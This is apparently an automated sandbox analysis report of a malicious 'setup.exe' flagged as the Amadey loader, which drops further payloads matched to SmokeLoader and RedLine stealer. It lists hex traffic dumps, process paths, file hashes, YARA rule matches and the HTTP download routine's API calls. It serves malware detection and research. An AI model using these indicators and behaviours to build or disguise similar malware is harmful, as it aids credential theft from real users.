2024-07-26 18:58:06 UTC	8000	IN	Data Raw: ec 8b 45 08 85 c0 74 12 83 e8 08 81 38 dd dd 00 00 75 07 50 e8 e3 a9 ff ff 59 5d c3 8b ff 55 8b ec 83 ec 10 a1 fc 3c 42 00 33 c5 89 45 fc 8b 55 18 53 33 db 56 57 3b d3 7e 1f 8b 45 14 8b ca 49 38 18 74 08 40 3b cb 75 f6 83 c9 ff 8b c2 2b c1 48 3b c2 7d 01 40 89 45 18 89 5d f8 39 5d 24 75 0b 8b 45 08 8b 00 8b 40 04 89 45 24 8b 35 0c f1 41 00 33 c0 39 5d 28 53 53 ff 75 18 0f 95 c0 ff 75 14 8d 04 c5 01 00 00 00 50 ff 75 24 ff d6 8b f8 89 7d f0 3b fb 75 07 33 c0 e9 52 01 00 00 7e 43 6a e0 33 d2 58 f7 f7 83 f8 02 72 37 8d 44 3f 08 3d 00 04 00 00 77 13 e8 a4 0d 00 00 8b c4 3b c3 74 1c c7 00 cc cc 00 00 eb 11 50 e8 05 a8 ff ff 59 3b c3 74 09 c7 00 dd dd 00 00 83 c0 08 89 45 f4 eb 03 89 5d f4 39 5d f4 74 ac 57 ff 75 f4 ff 75 18 ff 75 14 6a 01 ff 75 24 ff d6 85 c0 Data Ascii: Et8uPY]U<B3EUS3VW;~EI8t@;u+H;}@E]9]$uE@E$5A39](SSuuPu$};u3R~Cj3Xr7D?=w;tPY;tE]9]tWuuuju$
2024-07-26 18:58:06 UTC	8000	IN	Data Raw: 36 54 e5 bb 33 b7 75 5d 6a 7d 11 25 ae c8 e2 e8 64 1d 27 0c 89 40 7a 13 a9 2a 7f 75 31 22 e0 31 48 0d 59 48 77 a8 de e3 c6 ff 97 81 f5 00 f5 20 05 f2 db 50 3f f0 bb 43 47 38 ac be 26 b6 d7 b3 7a eb 1d 8f 2a 21 a0 44 91 79 2c c5 14 34 00 9f 80 c6 1d c9 6f c9 97 b2 49 d0 cc 6f 60 a4 b3 7d 83 14 c4 36 9b ce 09 ec b9 16 89 63 e0 65 17 d0 e3 d4 fb 07 11 e3 f1 c8 9a 55 78 50 6a f2 e4 0e 15 50 19 51 77 aa 5c 6a b4 42 f8 3c bb c4 2d cf 9f 11 69 0e 06 12 06 bb 65 f3 8f 3a f5 66 71 23 cf c6 5d 29 f5 2f b6 77 fa 5d 6b 67 fe 29 fc 44 e6 9f 3b 44 1a 40 cf 6c 2c 16 1d 46 ad 45 6e 95 c3 34 02 ce cf 09 20 90 4c 49 fd d7 5e 3c d7 bd 09 cb 18 10 0d 00 85 13 e6 5d 2e d9 14 64 a4 82 06 56 40 24 a0 f5 1f cd 98 a1 cf 3f 9d 29 ce bb f1 2a 33 b1 cf eb 23 d1 7f 7e e6 b9 07 ec 4c Data Ascii: 6T3u]j}%d'@zu1"1HYHw P?CG8&z!Dy,4oIo`}6ceUxPjPQw\jB<-ie:fq#])/w]kg)D;D@l,FEn4 LI^<].dV@$?)*3#~L
2024-07-26 18:58:06 UTC	8000	IN	Data Raw: da 59 0a 6d 12 26 6b 70 98 62 17 7a 98 c2 32 be 9c b0 2e de b0 23 bf 57 cd 1a ce e2 0a 34 80 c9 36 16 7a 59 e8 d5 1a 04 bd f7 b3 30 04 45 a4 41 f9 af ae 2f 4d a0 4c d2 25 a4 f5 69 fc 21 81 1d c1 65 f0 79 ab 74 db 3b ea 9e 57 3a 5c d4 5f fb ac 15 00 ed 95 2e 46 cd 8d 8b d9 82 77 66 3d 13 41 9a bf 22 86 03 df 26 3d d1 f8 8c b5 2f 08 10 f0 94 90 31 9a 78 de 97 b8 9d 8b 97 43 bc 83 5d e2 ce 75 7f e7 dd d8 29 f9 46 a5 f8 f4 93 99 4e 32 0f 88 0f 23 b2 fc 89 ab d1 d3 cc 9f b9 f9 2e 3b a2 c2 9d 6b 96 ba 4b 17 27 0c 94 cf 7f e8 90 a3 4f cc 25 cf 7a f0 70 41 88 27 5f 5f 8f 86 df 45 e5 71 ed 8c 7b bc d1 a0 8f 2c fd 84 43 51 79 0e c1 4a 3d 3c ca 25 e7 e6 30 ad f1 a5 69 ac ea 34 cc ad 36 01 3a 27 77 c2 16 18 d1 7d e7 c6 ac 9a 00 1a 5a e3 19 43 40 75 cb f1 84 cf 44 96 Data Ascii: Ym&kpbz2.#W46zY0EA/ML%i!eyt;W:\_.Fwf=A"&=/1xC]u)FN2#.;kK'O%zpA'__Eq{,CQyJ=<%0i46:'w}ZC@uD
2024-07-26 18:58:06 UTC	8000	IN	Data Raw: 5c e8 ef 4b 43 93 a3 ee 21 29 ab 3b c2 af bf 4f 4e 70 5c d9 9d 61 f1 7e 79 ab 14 3b 77 03 99 03 54 c5 5e 41 8c 66 2d 80 69 bc f1 ec cb 5c 6e f8 46 aa 40 e6 e0 04 61 d7 a9 ae 5a 27 3b 97 fc 13 dd 76 0c d5 18 20 84 b9 40 71 73 95 f4 c9 31 e2 8b 76 54 89 14 9d a1 bf e2 a3 39 e0 85 3b ab 8b 52 0a 4c 4a 98 e5 8e 3a 7a e6 75 da db 89 b8 d8 61 86 4f bd 7c d3 67 ea 64 c2 1d 98 dd 53 5b 32 45 ff 44 40 ff 94 ba 35 b8 0f c7 b7 d8 a4 02 a6 cb 4f 50 ba 0a cc b8 20 12 f0 f7 c0 fb 06 ab c9 9f 0f 91 1c 60 2b 2f 81 11 56 f5 6b 42 58 4d ea 30 90 26 53 25 4c 97 10 94 d3 79 99 94 74 f1 8f 63 36 8b 7e bd f5 fb fb 7c b3 2c 42 db 7c d3 82 17 58 39 72 a7 44 2d d9 07 f8 b8 4f 99 56 6e 58 9f a6 d5 1f 89 18 de d0 9e 41 5e b4 1f f9 fa 9e 7d 49 72 3e df 01 b8 eb 6b 2f a1 53 1a 1a b5 Data Ascii: \KC!);ONp\a~y;wT^Af-i\nF@aZ';v @qs1vT9;RLJ:zuaO\|gdS[2ED@5OP `+/VkBXM0&S%Lytc6~\|,B\|X9rD-OVnXA^}Ir>k/S
2024-07-26 18:58:06 UTC	8000	IN	Data Raw: 1d e0 da d9 05 34 89 b6 d2 f5 d2 3f 3c c8 cc 56 1d 4e 39 ed d1 ba a0 a7 40 af 73 15 d2 f8 30 3b 36 5c ed 86 b5 33 be 8f 95 60 70 5b b9 25 64 fb 92 3e 7e 02 6c 08 82 8e 0a b2 9c f3 52 1c ba b1 a9 30 71 de ca a8 9e 95 75 86 eb b7 f1 5f 94 cb 2d bd f0 63 7f af 62 cb f8 38 e3 b7 89 e8 49 c5 e9 6e 78 7e 62 3b c5 d0 40 75 12 a3 3c 6a 15 6d 14 2f fe 00 46 0d 40 12 e4 95 f5 bb da 08 7c af f3 64 2c e7 2b 3b 87 14 0e de 44 77 a0 97 f0 b9 64 83 e8 de fb c3 df 74 06 9c a6 77 28 5f 87 7a 21 c7 9b 60 73 79 19 9f ac 14 e1 dc 0f 2c a5 7b 4e ca 93 54 ea 68 69 a5 8c 6f d4 e7 20 bf c1 59 f5 2d 4f ca 92 74 12 ca 3e 49 ee 15 26 db 23 c6 99 7d cc fb 8e fb 47 a0 06 76 17 b4 6e 57 cd 79 4b a4 ba f0 92 26 3c ab 72 88 5a 69 a6 12 6c d3 09 aa 8f ae 5b d4 ce 10 f9 8f 05 9c ed f7 6e Data Ascii: 4?<VN9@s0;6\3`p[%d>~lR0qu_-cb8Inx~b;@u<jm/F@\|d,+;Dwdtw(_z!`sy,{NThio Y-Ot>I&#}GvnWyK&<rZil[n
2024-07-26 18:58:06 UTC	8000	IN	Data Raw: c4 ab 30 90 6b 18 98 30 b1 36 c1 28 a9 0e fa aa 22 26 62 34 9b 4d d6 ee 0d 7c c1 fe 4a 67 da bb dc 3f ea ae 80 dc 34 29 e0 8b 16 d1 fb 59 f1 72 1a f7 bb 7f 75 a2 bb de 51 3c 83 73 78 ab f9 03 17 f9 49 06 be ab 7c b5 24 e5 76 87 b5 70 b9 b0 ec d8 a3 c3 cb c0 d6 fc c0 ce 0f 0f e5 92 5c 8e 7b 39 2f 72 2e ae 99 7b e0 ed dd 85 66 c9 1e 4e bd b1 47 87 df 9f 8d cc 8a 47 b8 e6 af bb 39 4e 7e 8d d5 a5 46 e4 f2 f2 bf 8f 49 40 c2 92 79 3c 79 70 4b a5 2d 5b f4 fd 42 6f 9f c1 d1 19 0e c4 18 76 c9 22 3f cf 27 ed 5d bc 84 eb 38 e8 e3 2b f4 6d fc 69 cc 8d 96 95 f7 22 b4 c1 fb b4 19 e5 39 c5 78 8d ca 1e b6 d8 90 1b 04 17 7a 18 d4 62 80 06 05 96 61 94 08 90 dd 20 27 cc b6 5c 55 10 d5 6a 4b 5a 16 00 e8 47 6f 38 b4 25 9a 6a b0 de 5a 3d 6a 91 3a 2a 64 1e ac 3a 8a 74 d4 b6 82 Data Ascii: 0k06("&b4M\|Jg?4)YruQ<sxI\|$vp\{9/r.{fNGG9N~FI@y<ypK-[Bov"?']8+mi"9xzba '\UjKZGo8%jZ=j:*d:t

Target ID:	0
Start time:	14:56:55
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\setup.exe"
Imagebase:	0x760000
File size:	1'898'496 bytes
MD5 hash:	8EF54B7689AF3A0FE5028BC42964BB26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2066678423.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2025249873.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:56:58
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x230000
File size:	1'898'496 bytes
MD5 hash:	8EF54B7689AF3A0FE5028BC42964BB26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2055063157.0000000005120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2095516685.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:57:00
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x230000
File size:	1'898'496 bytes
MD5 hash:	8EF54B7689AF3A0FE5028BC42964BB26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2064925770.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2105418070.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:58:00
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x230000
File size:	1'898'496 bytes
MD5 hash:	8EF54B7689AF3A0FE5028BC42964BB26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2662669127.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:58:05
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\1000030001\2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000030001\2.exe"
Imagebase:	0x400000
File size:	239'616 bytes
MD5 hash:	E84A4D01A5798411ECEECA1F08E91AFB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2807030321.000000000247D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2807137209.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:58:12
Start date:	26/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	14:58:32
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Roaming\wsjctfw
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wsjctfw
Imagebase:	0x400000
File size:	239'616 bytes
MD5 hash:	E84A4D01A5798411ECEECA1F08E91AFB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.3041945625.000000000248D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.3042190062.0000000004080000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Function 04900D8D Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc815416114528a1a6159c829dbfb81ee4ada78e37b5555e2d73703e9e98d74
Instruction ID: 8819a2591064d00fc432c83cb73c0960b8fa73f47944c7cf7c443504df7cc12e
Opcode Fuzzy Hash: fdc815416114528a1a6159c829dbfb81ee4ada78e37b5555e2d73703e9e98d74
Instruction Fuzzy Hash: 02110CEB34C220BD604281957B58BBB6AAFE5D7630330CD37F407E59C2B6952A997031

Function 04900DCB Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cda0966cb0ab2537e3d12a2dd4fa7adeada56741b8e274c1a8bd0ac2e0d20668
Instruction ID: e63739819f33f8dbdd2f735211ee5f47198e3085838f6603d6f791b3a7e771cc
Opcode Fuzzy Hash: cda0966cb0ab2537e3d12a2dd4fa7adeada56741b8e274c1a8bd0ac2e0d20668
Instruction Fuzzy Hash: 1101DBA734C310EE914285A5735C3BB77A7AA97630330CD3AF407D65C1F7A43A497121

Function 04900DBB Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1111798c36d6a76660c6f7842f3ae697278f0410a71bf00b48bacd5cbf9dbed4
Instruction ID: a96c1bfe7751ec5582f394ea5b06ce22ef0c97744242cc9809b6a0759769507a
Opcode Fuzzy Hash: 1111798c36d6a76660c6f7842f3ae697278f0410a71bf00b48bacd5cbf9dbed4
Instruction Fuzzy Hash: 0A01A29734C220EE514381A5775C7BB6A97A9D7630330CD37F00BE66C1B6A43A897031

Function 04900E56 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cbc2ecb261066d1434f2aee282ede4313a3438049b0e7a36399f9d087d63b74
Instruction ID: 9f18729cdd2b9364e5d48ba788a88e693ba98c069df2c870ed4c7dfee6e7897f
Opcode Fuzzy Hash: 1cbc2ecb261066d1434f2aee282ede4313a3438049b0e7a36399f9d087d63b74
Instruction Fuzzy Hash: A301F9C724C660ACE2434091375D7B76F6B96D7231330CA77F047B86C3B685275A7122

Function 04900EC0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4efe93512a30875a8a07f8d3f90cf3a53b4c05facd82cdfb50971007ea286277
Instruction ID: 2cf297b0a9599a0d325aa9b6fd7ebe25474e06b6892c0e33ef23daf38220ba84
Opcode Fuzzy Hash: 4efe93512a30875a8a07f8d3f90cf3a53b4c05facd82cdfb50971007ea286277
Instruction Fuzzy Hash: B101219725CA20AD804241A13B5C3B77F9BEA97231330CA76E087E69C1B595324AB121

Function 04900DF0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce3773304af749a2dac609369641c2dca433bda5b85fab2689ac21609a4ae438
Instruction ID: 2697e214cc9c046ac0157eefcf475a9b4058340add5cc53661a6973fc591a6d3
Opcode Fuzzy Hash: ce3773304af749a2dac609369641c2dca433bda5b85fab2689ac21609a4ae438
Instruction Fuzzy Hash: 1FF0A49734C620ED50438195775C7B77BABA9D7630370CD37F00BE6AC1B6A426997121

Function 04900E1B Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8087fb3fd336d9698ff443dbc739ff1fe5bc46028ac86ce98658b800418bc50
Instruction ID: c702eea67746d13665cb4530eca76b0cdaf05409bd58256272725e66020c6e4b
Opcode Fuzzy Hash: a8087fb3fd336d9698ff443dbc739ff1fe5bc46028ac86ce98658b800418bc50
Instruction Fuzzy Hash: BFF0B4D728C520ED504341A57B5D7F76BABA6A7631330CE36F54BB2AC276D422897032

Function 04900E00 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d19cc2b9356c45c03c477c6c592ec2a82f5f4830c00726a0cfbc60dc724921d2
Instruction ID: 53be1f8aad7bd0b441e12a68baed957451da009f82909f99741ba25b1b4c1b4f
Opcode Fuzzy Hash: d19cc2b9356c45c03c477c6c592ec2a82f5f4830c00726a0cfbc60dc724921d2
Instruction Fuzzy Hash: 47F022D734C220FD904346A1731C7B77AABA9A7630330CE36F00BE6AC2B6A426487031

Function 04900E92 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2386a5dcd5da6d2f12aa1618747407700109528ed55a253b0cfd5225894f84a4
Instruction ID: ffabe25cd524bb3aa86cf7ce39a3f82a30a51a0a57ef798d78578754d1c54a8a
Opcode Fuzzy Hash: 2386a5dcd5da6d2f12aa1618747407700109528ed55a253b0cfd5225894f84a4
Instruction Fuzzy Hash: E9F0279778C620EC504350A5371C3B7AE5BA9D7531330CA37E14BB15C276D9228E7032

Function 04900E43 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c8cf8f390d31c5d97d6d98ba900078e3522fe8e2378e41e5a953ca8e5f30e11
Instruction ID: 7a58a2c015494177cdc5b7cd0c27a254acc7d7a9a0512e3dfd6bbefb058b6db5
Opcode Fuzzy Hash: 2c8cf8f390d31c5d97d6d98ba900078e3522fe8e2378e41e5a953ca8e5f30e11
Instruction Fuzzy Hash: 1EF027A764C520ED50434082770C7B7BAA7A993230330C976F047A19C136E822597032

Function 04900E33 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e951c2c5d4de7063de823f3327fa025901442019487c9bfff98c1707de23d75f
Instruction ID: 35e71708a4f3f01358da53feef6f754fdf16d86e15af8178b8bf2a0bae958f71
Opcode Fuzzy Hash: e951c2c5d4de7063de823f3327fa025901442019487c9bfff98c1707de23d75f
Instruction Fuzzy Hash: 77F0E59775C620EC504350E2371D3B76A9B69D7531330CA37F14BB56D236D8229D7032

Function 04900E7B Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070043235.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Offset: 04900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4900000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58d0e940a375e6a665120ee5ece757be487279960c764947902f9cd854e9bf6
Instruction ID: 74978f305d478dfc0b81f94b009740a0725e61cae09aa1bfbc567239eb7b1158
Opcode Fuzzy Hash: e58d0e940a375e6a665120ee5ece757be487279960c764947902f9cd854e9bf6
Instruction Fuzzy Hash: B1E0689B68C2109C400280E2771C7BB7EABE8D3130331CE37F443D15C17A95514E7031

Analysis Process: axplong.exePID: 5720, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	534
Total number of Limit Nodes:	48

Executed Functions

Function 0023BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00288D70,00000000,00000000,00000000,00000000), ref: 0023BDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0023BE11
HttpOpenRequestA.WININET(?,00000000), ref: 0023BE5B
HttpSendRequestA.WININET(?,00000000), ref: 0023BF1B
InternetReadFile.WININET(?,?,000003FF,?), ref: 0023BFCD
InternetCloseHandle.WININET(?), ref: 0023C0A7
InternetCloseHandle.WININET(?), ref: 0023C0AF
InternetCloseHandle.WININET(?), ref: 0023C0B7

Strings

stoi argument out of range, xrefs: 0023E3FA
RHYTYv==, xrefs: 0023BE33
8KG0fCKZFzY=, xrefs: 0023C385
8KG0fymoFx==, xrefs: 0023C2EB, 0023C543
invalid stoi argument, xrefs: 0023E404
RpKt, xrefs: 0023D516
d4), xrefs: 0023E2FF

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4)$invalid stoi argument$stoi argument out of range
API String ID: 688256393-530601469
Opcode ID: d9b73b7fe4818097f8118c4ab931d8f9274e6d1b109d54a0eae2d46806e49c30
Instruction ID: e8e67b4d97ec6d5bc3214ac4028bf74b5dc6ccbdf70a8ca98e45f46153ea6600
Opcode Fuzzy Hash: d9b73b7fe4818097f8118c4ab931d8f9274e6d1b109d54a0eae2d46806e49c30
Instruction Fuzzy Hash: F1B1E5B16201189BEF28DF28CC84BAEBB79EF45304F5041A9F508A7291D7719EE4CF94

Function 0023E440 Relevance: 14.6, Strings: 11, Instructions: 878
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#, xrefs: 00240534
GqKudSO2, xrefs: 0023E47F
WGt=, xrefs: 0023F62D, 0023F90A
fed3aa, xrefs: 0023FA9E
246122658369, xrefs: 0023F647, 0023F924, 002404F7
111, xrefs: 0023F6B0
WWp=, xrefs: 002404DA
MJB+, xrefs: 0023E734
MT==, xrefs: 0023E4A5
UD==, xrefs: 0023EA1F, 0023EC66
d4), xrefs: 0023F6D5

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
